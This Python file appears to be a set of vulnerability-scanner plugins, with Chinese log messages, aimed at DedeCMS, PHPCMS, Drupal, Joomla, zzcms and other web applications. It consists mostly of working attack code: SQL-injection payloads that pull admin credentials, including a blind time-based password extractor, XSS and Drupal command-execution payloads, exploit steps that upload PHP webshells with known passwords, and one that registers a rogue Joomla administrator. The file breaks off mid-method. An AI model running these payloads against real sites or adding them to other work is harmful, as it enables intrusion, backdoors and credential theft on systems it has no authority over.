    def verify(self):
        """Probe the target for the reflected-XSS issue this plugin covers.

        Joins ``self.target`` with the ``base_path`` option, turns the
        ``cookies`` option into a dict, POSTs a fixed form body to
        ``admin_collect.php?action=addrule`` and reports the vulnerability
        when the response body contains ``<script>alert(1)</script>``.
        Progress goes to ``self.output.info``; any exception is logged
        there too and swallowed, so the method never raises.
        """
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Log in first: the session cookies come from the 'cookies' option.
            # Segments are not stripped, so "a=1; b=2" yields the key " b", and a
            # segment without '=' (e.g. a trailing ';') raises ValueError on the
            # unpack below, which the outer except turns into a log line.
            s = requests.session()
            cookies = {}
            raw_cookies = self.get_option('cookies')
            for line in raw_cookies.split(';'):
                key, value = line.split('=', 1)  # maxsplit=1: split only at the first '=' so values containing '=' survive
                cookies[key] = value

            # Verify the vulnerability.
            payload = '/upload/houtai/admin_collect.php?action=addrule'
            url = self.target + payload
            headers = {
                'Referer': '%s&id=3' % (payload),
                'Content-Type': 'application/x-www-form-urlencoded'
            }
            # The backslash continuations keep the following lines' indentation
            # inside the literal, so the body carries runs of spaces before
            # '&coding' and '&pageurl2'.
            data = "step=2&id=3&itemname=11&intodatabase=0&getherday=0&siteurl=aaa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E \
                    &coding=gb2312&playfrom=&downfrom=&autocls=0&classid=0&inithit=0&pageset=0&pageurl0=&pageurl1=&istart=1&iend=1 \
                    &pageurl2=&Submit=%E4%BF%9D%E5%AD%98%E4%BF%A1%E6%81%AF%E5%B9%B6%E8%BF%9B%E5%85%A5%E4%B8%8B%E4%B8%80%E6%AD%A5%E8%AE%BE%E7%BD%AE"
            self.output.info('正在尝试XSS请求')
            r = s.post(url, headers=headers, cookies=cookies, data=data)

            # NOTE(review): the marker searched for here is not the fragment the
            # body above submits (an img/onerror element), so this only fires if
            # the server itself emits a script tag — confirm the intended marker.
            if '<script>alert(1)</script>' in r.text:
                self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                    target=self.target, name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Timing-based check against ``/e/member/state.aspx``.

        Primes a session with a GET to the target, POSTs two form bodies to
        the endpoint and measures each round trip with ``time.time()``.
        The vulnerability is reported when the first request took more
        than 10 seconds longer than the second. Exceptions are logged via
        ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # A registered, logged-in account is needed for the cookies;
            # after registering, visiting the logged-in state page yields them.
            # NOTE(review): no credentials are supplied here — s.get() only
            # primes the session's cookie jar with whatever the front page sets.
            s = requests.session()
            s.get(self.target)
            payload = '/e/member/state.aspx?table=pa_member&detailid=2&workid=1&s=1'
            true_data = "post=update&current_title=111&current_username=aaaa2222&sendmail=1&author=' or (select top 1 asc(mid(UserName+UserPassword,1,1)) from pa_member)=97 and (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0  and ''='"
            false_data = "post=update&current_title=111&current_username=aaaa2222&sendmail=1&author=' or (select top 1 asc(mid(UserName+UserPassword,1,1)) from pa_member)=97 and (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0  and ''='"
            url = self.target + payload

            start_time = time.time()
            r = s.post(url, data=true_data)
            end_time_true = time.time()
            r = s.post(url, data=false_data)
            end_time_false = time.time()

            # Report when the first POST took more than 10 s longer than the second.
            # NOTE(review): true_data and false_data are byte-identical, so the two
            # timings differ only by network/server jitter; the comparison cannot
            # separate vulnerable from non-vulnerable hosts as written — confirm
            # the intended bodies.
            if (end_time_true - start_time) - (end_time_false -
                                               end_time_true) > 10:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Marker-based check against ``/xdan_Admin/SEMCMS_Banner.php``.

        Primes a session on the page, then requests it again with a query
        string whose ``lgid`` value embeds ``md5(c)``. The vulnerability is
        reported when the response contains md5("c"),
        ``4a8a08f09d37b73795649038408b5f33``. Exceptions are logged via
        ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Log in as a back-end user
            # and obtain its cookies.
            s = requests.session()
            cookies = {}
            # The triple-quoted block below is a disabled sample of cookie
            # parsing. It is a bare string statement with no effect, so
            # `cookies` stays empty and the GET below sends no cookies.
            '''
            raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
            for line in raw_cookies.split(';'):  
                key,value=line.split('=',1)#1代表只分一次,得到两个数据  
                cookies[key]=value 
            '''
            payload = '/xdan_Admin/SEMCMS_Banner.php'
            url = self.target + payload
            s.get(url, cookies=cookies)
            verify_url = url + \
                "?lgid=1%20and%201=1%20union%20select%201,2,concat(user(),0xa3a,md5(c)),4,5,6,7#"
            r = s.get(verify_url)

            # md5("c") — the marker the query string asks the server to compute.
            if '4a8a08f09d37b73795649038408b5f33' in r.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Marker-based check against ``/admin/admin_feedback.php``.

        Primes a session on the page, then requests it with an ``audit``
        query parameter that embeds ``md5(c)``. Reports the vulnerability
        when the response contains md5("c"),
        ``4a8a08f09d37b73795649038408b5f33``. Exceptions are logged via
        ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Log in as a back-end user.
            s = requests.session()
            # Obtain its cookies.
            cookies = {}
            # The triple-quoted block below is a disabled sample of cookie
            # parsing; it is a no-op string statement, so `cookies` stays empty.
            '''
            raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
            for line in raw_cookies.split(';'):  
                key,value=line.split('=',1)#1代表只分一次,得到两个数据  
                cookies[key]=value 
            '''
            s.get(self.target + '/admin/admin_feedback.php', cookies=cookies)
            payload = '/admin/admin_feedback.php?act=report_list&audit=1%20union%20select%201,2,3,4,5,6,7,md5(c),9,10%23'
            url = self.target + payload
            r = s.get(url)

            # md5("c") — the marker the query string asks the server to compute.
            if '4a8a08f09d37b73795649038408b5f33' in r.text:
                self.output.report(self.vuln, '发现{target}存在{name}漏洞\n具体请查看漏洞详情'.format(
                    target=self.target, name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def exploit(self):
        """Exploit step for the ``/dede/tpl.php`` issue.

        Fetches the upload page, extracts the hidden one-time token with a
        regex, then issues a ``savetagfile`` GET that writes
        ``cscan.lib.php`` under ``/include/taglib/``. The written file is
        then fetched directly and the vulnerability is reported when the
        response contains both ``PHP Version`` and ``System``.

        This step leaves a file on the target; the report message asks the
        operator to delete it. Exceptions are logged via
        ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # First obtain the token: visit domain + /dede/tpl.php?action=upload
            s = requests.session()
            r = s.get(self.target+'/dede/tpl.php?action=upload')
            # Extract the token from the hidden input.
            p = re.compile(
                r'<input type="hidden" name="([0-9a-f]+)" value="1" />')
            # findall() is evaluated twice here; the first match wins.
            if p.findall(r.text):
                token = p.findall(r.text)[0]

                s.get(
                    self.target + '/dede/tpl.php?filename=cscan.lib.php&action=savetagfile&content=%3C?php%20phpinfo();eval($_POST[c]);?%3E&token={token}'.format(token=token))
                verify_url = self.target + '/include/taglib/cscan.lib.php'
                # Plain requests.get(): this verification request deliberately (?)
                # bypasses the session's cookies — confirm.
                r = requests.get(verify_url)

                if 'PHP Version' in r.text and 'System' in r.text:
                    self.output.report(self.vuln, '发现{target}存在{name}漏洞,已上传webshell地址:{url}密码为c,请及时删除。'.format(
                        target=self.target, name=self.vuln.name, url=verify_url))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Marker-based check against the ``poster_click`` endpoint.

        Primes a session on the target, then GETs
        ``/index.php?m=poster&c=index&a=poster_click&id=1`` and reports the
        vulnerability when the response contains md5("c"),
        ``4a8a08f09d37b73795649038408b5f33``. Exceptions are logged via
        ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            s = requests.session()
            s.get(self.target)
            payload = "/index.php?m=poster&c=index&a=poster_click&id=1"
            url = self.target + payload
            # NOTE(review): `headers` is built but never passed to the request
            # below, so as written it is dead code and the GET sends the
            # session's default headers only.
            headers = {
                'Referer':
                "http://{target}’,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,md5(c),0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#"
                .format(target=self.target)
            }
            r = s.get(url)

            # md5("c").
            if '4a8a08f09d37b73795649038408b5f33' in r.text:
                self.output.report(
                    self.vuln, '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
                        target=self.target, name=self.vuln.name, url=url))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Differential check against ``/link/index/list``.

        Requests the listing twice with two different ``sort`` values and
        reports the vulnerability when the two response bodies are not
        byte-equal. Exceptions are logged via ``self.output.info`` and
        swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Register a user first.
            s = requests.session()
            # Obtain cookies.
            cookies = {}
            # The triple-quoted block below is a disabled sample of cookie
            # parsing; it is a no-op string statement, so `cookies` stays empty.
            '''
            raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
            for line in raw_cookies.split(';'):  
                key,value=line.split('=',1)#1代表只分一次,得到两个数据  
                cookies[key]=value 
            '''
            s.get(self.target, cookies=cookies)
            payload_normal = "/link/index/list?type=1&offset=0&limit=50&_=1440172313381&sort=desc,if(1=1,1,1)='1',1,(select%201%20from%20information_schema.TABLES))&category=2"
            payload_abnormal = "/link/index/list?type=1&offset=0&limit=50&_=1440172313381&sort=desc,if(1=2,1)='1',1,(select%201%20from%20information_schema.TABLES))&category=2"
            url_normal = self.target + payload_normal
            url_abnormal = self.target + payload_abnormal
            r_normal = s.get(url_normal)
            r_abnormal = s.get(url_abnormal)

            # Whole-body inequality: any dynamic content (timestamps, nonces,
            # per-request tokens) in the page also makes this fire, so expect
            # false positives on pages that are not fully static.
            if r_normal.text != r_abnormal.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Marker-based check against ``/web/index.php?c=platform&a=qr``.

        Primes a session on ``/web/index.php``, GETs the ``delsata`` action
        with an ``id[]`` query string embedding ``md5(c)`` and reports the
        vulnerability when the response contains md5("c"),
        ``4a8a08f09d37b73795649038408b5f33``. Exceptions are logged via
        ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Log in as a user.
            s = requests.session()
            # Obtain cookies.
            cookies = {}
            # The triple-quoted block below is a disabled sample of cookie
            # parsing; it is a no-op string statement, so `cookies` stays empty.
            '''
            raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
            for line in raw_cookies.split(';'):  
                key,value=line.split('=',1)#1代表只分一次,得到两个数据  
                cookies[key]=value 
            '''
            s.get(self.target + '/web/index.php', cookies=cookies)
            # `\&` is not a recognised Python escape, so the backslash is kept
            # literally in the string (newer interpreters emit a warning for it).
            payload = "/web/index.php?c=platform&a=qr&do=delsata&id[0]=1\&id[1]=)/**/and/**/extractvalue(1,/**/concat(0x5c,/**/(select/**/md5(c))))--+"
            url = self.target + payload
            r = s.get(url)

            # md5("c").
            if '4a8a08f09d37b73795649038408b5f33' in r.text:
                self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                    target=self.target, name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Check for the Drupal ``user/register`` AJAX render issue.

        POSTs a form whose ``mail`` element carries a ``#post_render``
        callback of ``exec`` and a ``#markup`` shell command that echoes a
        marker into ``hello.txt``. The method then GETs ``/hello.txt`` and
        reports the vulnerability when it contains md5("1"),
        ``c4ca4238a0b923820dcc509a6f75849b``.

        Side effect: on a vulnerable host this leaves ``hello.txt`` in the
        web root; nothing here removes it. Exceptions are logged via
        ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            # The output depends on the command passed in, so the payload will
            # be generalised later, once the framework supports custom parameters.
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            s = requests.session()
            payload = {
                'form_id':
                'user_register_form',
                '_drupal_ajax':
                '1',
                'mail[#post_render][]':
                'exec',
                'mail[#type]':
                'markup',
                'mail[#markup]':
                'echo "c4ca4238a0b923820dcc509a6f75849b" | tee hello.txt'
            }
            # `res` is never inspected; only the follow-up GET decides the result.
            res = s.post(
                self.target +
                '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax',
                data=payload)
            r = s.get(self.target + '/hello.txt')
            # print(r.text)
            # md5("1") — the marker the command above writes.
            if 'c4ca4238a0b923820dcc509a6f75849b' in r.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Check the ``admin_ping.php?action=set`` code-injection issue.

        Parses the ``cookies`` option into a dict, POSTs a ``token`` value
        that closes the string and appends a ``phpinfo()`` call, then GETs
        ``/data/admin/ping.php`` and reports the vulnerability when the
        response contains both ``PHPVersion`` and ``System``.

        Side effect: on a vulnerable host the injected code stays in
        ``/data/admin/ping.php``; nothing here reverts it. Exceptions are
        logged via ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Log in first: the session cookies come from the 'cookies' option.
            # Segments are not stripped, and a segment without '=' raises
            # ValueError on the unpack, which the outer except logs.
            s = requests.session()
            cookies = {}
            raw_cookies = self.get_option('cookies')
            for line in raw_cookies.split(';'):
                key, value = line.split('=', 1)  # maxsplit=1: split only at the first '=' so values containing '=' survive
                cookies[key] = value

            # Verify the vulnerability.
            payload = '/admin/admin_ping.php?action=set'
            url = self.target + payload
            data = {"token": "123456789\";$var=phpinfo().\""}
            self.output.info('正在尝试上传可执行代码 phpinfo() 到/data/admin/ping.php中')
            s.post(url, data=data, cookies=cookies)
            verify_url = self.target + '/data/admin/ping.php'
            r = s.get(verify_url)

            if 'PHPVersion' in r.text and 'System' in r.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞,已上传可执行代码 phpinfo() 到/data/admin/ping.php中'
                    .format(target=self.target, name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
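 def check_my_shell(self, shell_url):
     """Return True when the body served at ``shell_url`` contains the md5(666) marker.

     ``shell_url`` is fetched with a fresh ``requests`` session and the
     result is the plain membership test, replacing the redundant
     ``if ...: return True else: return False`` branch. Network errors
     propagate to the caller unchanged, as before.
     """
     marker = "fae0b27c451c728867a567e8c1bb4e53"  # md5(666)
     s = requests.session()
     res = s.get(shell_url)
     return marker in res.text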
    def verify(self):
        """Session-cookie length probe against the target's front page.

        Fetches the target, pulls the first ``name=value`` pair out of the
        stringified response headers (everything before ``; path=/``,
        after the last ``'``), pads the value with 4000 random
        alphanumeric characters and then re-requests the page up to ten
        times with that cookie. The vulnerability is reported the first
        time a response body is not longer than every previous one.

        Returns ``None`` in every path. Exceptions are logged via
        ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            _Host = self.target
            try:
                _Req = requests.session().get(_Host)

                # Header parsing works on the dict's repr, not on the Set-Cookie
                # value itself: take the text before '; path=/', then the part
                # after the last single quote, then split it at '='.
                _WebContent = str(_Req.headers)
                _WebTmp = _WebContent.split('; path=/')
                _WebTmp = _WebTmp[0]
                _WebTmp = _WebTmp.split('\'')
                _WebTmp = _WebTmp[len(_WebTmp) - 1]
                _WebTmp = _WebTmp.split('=')
                _SessionID = _WebTmp[0]
                _Session = _WebTmp[1]
            except:
                # Bare except: also swallows KeyboardInterrupt/SystemExit and
                # gives no log line, so a missing cookie header exits silently.
                #args['success'] = False
                return None

            # Extend the cookie value by 4000 random characters; this is
            # string concatenation in a loop, which is quadratic but small.
            for i in range(4000):
                _Session += random.choice(['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'q', 'w', 'e', 'r', 't', 'y', 'u', 'i',
                                           'o', 'p', 'a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l', 'z', 'x', 'c', 'v', 'b', 'n', 'm'])

            _Cookies = {
                _SessionID: _Session
            }

            HEADER = {
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0'
            }

            # _Count tracks the longest body seen so far; the first response that
            # does not exceed it triggers the report and ends the loop.
            _Count = 0
            for i in range(10):
                _req = requests.get(_Host, cookies=_Cookies, headers=HEADER)
                _TmpContent = _req.text
                if len(_TmpContent) > _Count:
                    _Count = len(_TmpContent)
                    #args['success'] = False
                else:
                    #args['success'] = True
                    self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                        target=self.target, name=self.vuln.name))
                    break
            return None

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def exploit(self):
        """Exploit step for the Joomla ``registration.register`` issue.

        Fetches the registration page, extracts the hidden form token with
        a regex, then submits a multipart registration (via ``files=`` with
        ``(None, value)`` tuples) for a random ``admin_<n>`` account whose
        ``user[groups][]`` is ``7``. Redirects are not followed; the
        vulnerability is reported when the ``Location`` header points back
        at the registration view, and the message includes the username
        and password that were submitted.

        Side effect: on a vulnerable host this creates an account that the
        method does not remove. A response without a ``Location`` header
        raises ``KeyError``, which the outer except logs. Exceptions are
        logged via ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))
            s = requests.session()
            # get cookie
            r = s.get(self.target +
                      '/index.php/component/users/?task=registration.register')
            # Extract the form token from the hidden input.
            p = re.compile(
                r'<input type="hidden" name="([0-9a-f]+)" value="1" />')
            # findall() is evaluated twice here; the first match wins.
            if p.findall(r.text):
                token = p.findall(r.text)[0]
                # Generate random registration details (random, not secrets:
                # the suffix only needs to be unlikely to collide, not unguessable).
                randstr = '_' + str(random.randint(1, 10000))
                info = 'admin' + randstr
                data = {
                    # User object
                    'task': (None, 'user.register'),
                    'option': (None, 'com_users'),
                    'user[name]': (None, 'admin' + randstr),
                    'user[username]': (None, 'admin' + randstr),
                    'user[password1]': (None, 'admin' + randstr),
                    'user[password2]': (None, 'admin' + randstr),
                    'user[email1]': (None, 'admin' + randstr + '@xx.com'),
                    'user[email2]': (None, 'admin' + randstr + '@xx.com'),
                    'user[groups][]': (None, '7'),  # Administrator!
                    token: (None, '1')
                }
                r = s.post(
                    self.target +
                    '/index.php/component/users/?task=registration.register',
                    files=data,
                    allow_redirects=False)

                if 'index.php?option=com_users&view=registration' in r.headers[
                        'location']:
                    self.output.report(
                        self.vuln,
                        '发现{target}存在{vulnname}漏洞,已注册用户名:{name},密码:{passwd}'.
                        format(target=self.target,
                               vulnname=self.vuln.name,
                               name=info,
                               passwd=info))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Timing-based check against ``/user/adv2.php?action=modify``.

        Primes a session, POSTs a ``normal`` body and then a ``sleep(5)``
        body to the endpoint, timing each with ``time.time()``, and reports
        the vulnerability when the second request took more than 4 seconds
        longer than the first. Exceptions are logged via
        ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Register a user first.
            # Obtain cookies.
            cookies = {}
            # The triple-quoted block below is a disabled sample of cookie
            # parsing; it is a no-op string statement.
            '''
            raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
            for line in raw_cookies.split(';'):  
                key,value=line.split('=',1)#1代表只分一次,得到两个数据  
                cookies[key]=value 
            '''
            s = requests.session()
            s.get(self.target)
            payload = '/user/adv2.php?action=modify'
            # NOTE(review): this reassignment replaces the empty dict above, but
            # neither `cookies` nor `flag` is used by the requests below, so both
            # are dead as written.
            cookies = {'UserName': '******'}
            flag = ''
            data_sleep = {
                'id':
                '0 or if((select ascii(substr(pass,1,1)) from zzcms_admin)=33,sleep(5),0)'
            }

            data_normal = {
                'id':
                '0 or if((select ascii(substr(pass,1,1)) from zzcms_admin)=33,md5(c),0)'
            }
            url = self.target + payload
            time_start = time.time()
            s.post(url, data=data_normal)
            time_end_normal = time.time()
            s.post(url, data=data_sleep)
            time_end_sleep = time.time()

            # Report when the sleep request took more than 4 s longer than the
            # normal one; a slow or loaded host can trip this on its own.
            if (time_end_sleep - time_end_normal) - (time_end_normal -
                                                     time_start) > 4:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def exploit(self):
        """Exploit step for the chanzhi ``package&f=upload`` issue.

        Primes a session on the upload URL, POSTs a hand-built multipart
        body (the ``data`` literal, sent verbatim including its leading
        newline and per-line indentation) containing ``php.php``, then
        GETs ``/chanzhi/system/tmp/package/php.php`` and reports the
        vulnerability when the response contains md5("c"),
        ``4a8a08f09d37b73795649038408b5f33``.

        Side effect: on a vulnerable host this leaves ``php.php`` on the
        server; the report message asks the operator to delete it.
        Exceptions are logged via ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Obtain cookies.
            cookies = {}
            # The triple-quoted block below is a disabled sample of cookie
            # parsing; it is a no-op string statement, so `cookies` stays empty.
            '''
            raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
            for line in raw_cookies.split(';'):  
                key,value=line.split('=',1)#1代表只分一次,得到两个数据  
                cookies[key]=value 
            '''

            # Log in as a back-end user.
            s = requests.session()
            payload = '/chanzhi/admin.php?m=package&f=upload'
            url = self.target + payload
            s.get(url, cookies=cookies)

            # The boundary in Content-Type must match the one used in `data`.
            headers = {
                "Accept": "application/json, text/javascript, */*; q=0.01",
                "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryGgFOYWAluy1F8lvn",
                "Accept-Language": "zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4",
            }
            # Triple-quoted literal: the newline after """ and the 16-space
            # indentation of every line are part of the request body.
            data = """
                ------WebKitFormBoundaryGgFOYWAluy1F8lvn
                Content-Disposition: form-data; name="file"; filename="php.php"
                Content-Type: text/php

                <?php echo md5(c);@eval($_GET['c']);>
                ------WebKitFormBoundaryGgFOYWAluy1F8lvn--
            """
            s.post(url, headers=headers, data=data)
            verify_url = self.target + '/chanzhi/system/tmp/package/php.php'
            r = s.get(verify_url)

            # md5("c").
            if '4a8a08f09d37b73795649038408b5f33' in r.text:
                self.output.report(self.vuln, '发现{target}存在{name}漏洞,已上传webshell地址:{url}密码为c,请及时删除。'.format(
                    target=self.target, name=self.vuln.name, url=verify_url))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Timing-based check on the ``X-Forwarded-For`` header of ``reg.php``.

        Parses the ``cookies`` option into a dict, primes the session on
        ``/upload/reg.php?action=reg``, then POSTs the same registration
        body twice — once with a ``version()`` header value and once with
        a ``sleep(5)`` one — timing each with ``time.time()``. The
        vulnerability is reported when the sleep request took more than
        4 seconds longer than the normal one. Exceptions are logged via
        ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Log in first: the session cookies come from the 'cookies' option.
            # Segments are not stripped, and a segment without '=' raises
            # ValueError on the unpack, which the outer except logs.
            s = requests.session()
            cookies = {}
            raw_cookies = self.get_option('cookies')
            for line in raw_cookies.split(';'):
                key, value = line.split('=', 1)  # maxsplit=1: split only at the first '=' so values containing '=' survive
                cookies[key] = value

            # Verify the vulnerability.
            payload = '/upload/reg.php?action=reg'
            url = self.target + payload
            s.get(url, cookies=cookies)
            headers_sleep = {
                'X-Forwarded-For':
                "1.1.1.1' or updatexml(1,concat(0x7e,(sleep(5))),0) or '"
            }
            headers_normal = {
                'X-Forwarded-For':
                "1.1.1.1' or updatexml(1,concat(0x7e,(version())),0) or '"
            }
            data = "m_user=aaaaaa&m_pwd=123456&m_pwd2=123456&email=1111aaaaaas%40qq.coam"

            # Both POSTs reuse the session; only the header differs.
            time_start = time.time()
            s.post(url, data=data, headers=headers_normal)
            time_end_normal = time.time()
            s.post(url, data=data, headers=headers_sleep)
            time_end_sleep = time.time()

            # Report when the sleep request took more than 4 s longer than the
            # normal one; a slow or loaded host can trip this on its own.
            if (time_end_sleep - time_end_normal) - (time_end_normal -
                                                     time_start) > 4:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def exploit(self):
        """Exploit step for the ``/user/adv2.php?action=modify`` timing issue.

        Primes a session, then for positions 1..39 and candidate values
        33..124 POSTs a body whose ``id`` embeds a conditional ``sleep(3)``
        and keeps ``chr(j)`` whenever the response's elapsed whole seconds
        exceed 2. The accumulated string is printed to stdout; nothing is
        passed to ``self.output.report``. Exceptions are logged via
        ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Register a user first.
            # Obtain cookies.
            cookies = {}
            # The triple-quoted block below is a disabled sample of cookie
            # parsing; it is a no-op string statement.
            '''
            raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
            for line in raw_cookies.split(';'):  
                key,value=line.split('=',1)#1代表只分一次,得到两个数据  
                cookies[key]=value 
            '''
            s = requests.session()
            s.get(self.target)
            payload = '/user/adv2.php?action=modify'
            url = self.target + payload
            # This reassignment replaces the empty dict above; it is what the
            # POSTs below send.
            cookies = {'UserName': '******'}
            flag = ''
            for i in range(1, 40):
                for j in range(33, 125):
                    data = {
                        'id':
                        '0 or if((select ascii(substr(pass,{},1)) from zzcms_admin)={},sleep(3),0)'
                        .format(i, j)
                    }
                    # print data
                    r = s.post(url, data=data, cookies=cookies)
                    # print r.text
                    # timedelta.seconds is the whole-seconds component only.
                    sec = r.elapsed.seconds
                    # print i,j,sec
                    if sec > 2:
                        flag += chr(j)
                        # Progress goes to stdout rather than self.output.
                        print(flag)
                        break
            print(flag)

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Marker-based check on the ``X-Forwarded-For`` header of ``/index.php``.

        GETs the page once plainly, then again with the crafted header,
        and reports the vulnerability when the status is 200 and the body
        contains md5("c"), ``4a8a08f09d37b73795649038408b5f33``.
        Exceptions are logged via ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip(
